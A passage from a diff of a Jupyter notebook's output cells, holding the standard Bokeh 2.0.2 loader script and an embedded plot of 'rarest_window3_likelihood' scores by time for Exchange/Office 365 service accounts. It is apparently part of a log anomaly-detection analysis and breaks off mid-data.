+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1001\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"24aa99fd-b167-4c8f-9751-df6897a67ae4\" data-root-id=\"1073\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"9bce5117-3ac2-45a6-bc53-0069e089c8c3\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1003\"},{\"id\":\"1043\"}]},\"id\":\"1073\",\"type\":\"Column\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1087\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1044\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1088\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1069\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1068\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1068\"}]},\"id\":\"1058\",\"type\":\"Toolbar\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1084\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Timeline\"},\"id\":\"1004\",\"type\":\"Title\"},{\"attributes\":{\"formatter\":{\"id\":\"1060\"},\"ticker\":{\"id\":\"1055\"}},\"id\":\"1054\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1086\",\"type\":\"DaysTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1054\"},{\"id\":\"1059\"}],\"center\":[{\"id\":\"1057\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1066\"}],\"title\":{\"id\":\"1044\"},\"toolbar\":{\"id\":\"1058\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1046\"},\"x_scale\":{\"id\":\"1050\"},\"y_range\":{\"id\":\"1048\"},\"y_scale\":{\"id\":\"1052\"}},\"id\":\"1043\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"rarest_window3_likelihood\",\"@rarest_window3_likelihood\"],[\"UserId\",\"@UserId\"],[\"rarest_window3\",\"@rarest_window3\"],[\"ClientIP\",\"@ClientIP\"],[\"time_col\",\"@time_col\"]]},\"id\":\"1002\",\"type\":\"HoverTool\"},{\"attributes\":{\"source\":{\"id\":\"1037\"}},\"id\":\"1042\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1085\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1090\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1060\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"1091\",\"type\":\"YearsTicker\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1027\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1107\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"1037\"},\"glyph\":{\"id\":\"1039\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1040\"},\"selection_glyph\":null,\"view\":{\"id\":\"1042\"}},\"id\":\"1041\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"below\":[{\"id\":\"1014\"}],\"center\":[{\"id\":\"1017\"},{\"id\":\"1021\"}],\"left\":[{\"id\":\"1018\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"1041\"}],\"title\":{\"id\":\"1004\"},\"toolbar\":{\"id\":\"1028\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1006\"},\"x_scale\":{\"id\":\"1010\"},\"y_range\":{\"id\":\"1008\"},\"y_scale\":{\"id\":\"1012\"}},\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1089\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1050\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1108\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis\":{\"id\":\"1054\"},\"ticker\":null},\"id\":\"1057\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1019\",\"type\":\"BasicTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1035\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"1078\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"end\":1590653434300.0,\"start\":1584553482700.0},\"id\":\"1006\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1024\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1012\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1092\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1093\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1082\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1008\",\"type\":\"DataRange1d\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1035\"},\"ticker\":{\"id\":\"1015\"}},\"id\":\"1014\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"1010\",\"type\":\"LinearScale\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1080\"},{\"id\":\"1081\"},{\"id\":\"1082\"},{\"id\":\"1083\"},{\"id\":\"1084\"},{\"id\":\"1085\"},{\"id\":\"1086\"},{\"id\":\"1087\"},{\"id\":\"1088\"},{\"id\":\"1089\"},{\"id\":\"1090\"},{\"id\":\"1091\"}]},\"id\":\"1015\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1022\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"axis_label\":\"rarest_window3_likelihood\",\"formatter\":{\"id\":\"1078\"},\"ticker\":{\"id\":\"1019\"}},\"id\":\"1018\",\"type\":\"LinearAxis\"},{\"attributes\":{\"axis\":{\"id\":\"1014\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1017\",\"type\":\"Grid\"},{\"attributes\":{\"data\":{\"ClientIP\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"TimeGenerated_min\":{\"__ndarray__\":\"AIDbVGggd0IAgL9qcyB3QgCAk//9IndCAIA9+wcjd0IAAILHTiN3QgCAWwpYI3dCAIBegKIjd0IAAM2/qyN3QgCAaPL1IXdCAICHSt0id0IAAAUB8iJ3QgCAF7QGI3dCAIDBbRsjd0IAgIkiMCN3QgCAqt1EI3dCAICci1kjd0IAgHw8biN3QgCAeyd1I3dCAAAp1okjd0IAgGEGlyN3QgAA/berI3dCAIDGi8Ajd0IAAHK90BB3QgAA+zjREHdCAABAbNEQd0IAgMgw0hB3QgCABQbUEHdCAIDi5NYQd0IAgCrT1xB3QgAAzWGAEXdCAADqZYIRd0IAANyRghF3QgCAYRiDEXdCAIBJFoQRd0IAAIN/hBF3QgAAiuaEEXdCAADYVoURd0IAAOPmhRF3QgAAcxCQEXdCAIAvrMYRd0IAAM4TyBF3QgCAaNXIEXdCAIAB+8gRd0IAAAxXyRF3QgCAgEjKEXdCAAA4FMwRd0IAAHsu5hJ3QgCAS/h1E3dCAACt+aETd0IAALE5sxN3QgAAnWazE3dCAAA5n0wUd0IAgFNMwxR3QgAAQ4TpFHdCAICmY+oUd0IAAOKi6hR3QgAAVwIMFXdCAAC34mEVd0IAgNr1aRV3QgAAdweqFXdCAIDBgqoVd0IAAAfqqhV3QgCAyrmrFXdCAID976sVd0IAAMmOrRV3QgAAf8StFXdCAAC/9/0Vd0IAgGs5/hV3QgAABCX/FXdCAIC2Zf8Vd0IAAOyl/xV3QgAAnFkAFndCAACYKgEWd0IAAA8mAhZ3QgCA2UG9F3dCAIBPmccXd0IAABM8Dhh3QgCA34kZGHdCAADzxlIYd0IAACLxYhh3QgCAxFFsGHdCAIBZFp8Yd0IAANb/rhh3QgAA3/q5GHdCAICw0AUZd0IAAFGZWBl3QgCAHAJjGXdCAICF+P0Zd0IAgNddWhp3QgAAPOSPGndCAABuvaIad0IAgOlirBp3QgCAGsX/GndCAACGz0Ubd0IAgNqtURt3QgAA5jiaG3dCAADJcfYbd0IAALxTZxx3QgAAn8qPHHdCAIBo2pocd0IAABY00hx3QgAAZ3zjHHdCAIA8E+0cd0IAAGUE/hx3QgCAAoNSHXdCAAA8NSwed0IAAJXzNx53QgCAy8NbHndCAICiMlwed0IAAOXSXR53QgCA1MN6HndCAABTTn4ed0IAALJXJB93QgCAb3UtH3dCAICo7nUfd0IAAK9DFyB3QgAAPoIhIHdCAAAq/Q4hd0IAgC4eGSF3QgAA+vRkIXdCAADabMEhd0IAAArWwyF3QgCAxovMIXdCAICUP+Ehd0IAgGjy9SF3QgCAA3YJIndCAIBE/Qkid0IAgHVRDCJ3QgAAmgEhIndCAIA7sjUid0IAAE5lSiJ3QgCA0RpfIndCAIAXUHAid0IAgEDJcyJ3QgCAFTh7IndCAIDU8YQid0IAgLPzjyJ3QgCAiDKfIndCAAC7b6oid0IAgG7isyJ3QgCATZ21IndCAADCscUid0IAgK0nxiJ3QgCAm5vIIndCAIBdRsoid0IAgMMF0iJ3QgAAyN/SIndCAACcENMid0IAAHN/0yJ3QgCAUKTTIndCAACTzdMid0IAAMsX1CJ3QgAAXU3VIndCAIB1fdUid0I=\",\"dtype\":\"float64\",\"shape\":[154]},\"UserId\":[\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NT AUTHORITY\\\\SYSTEM (MSExchangeMigrationWorkflow)\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"Na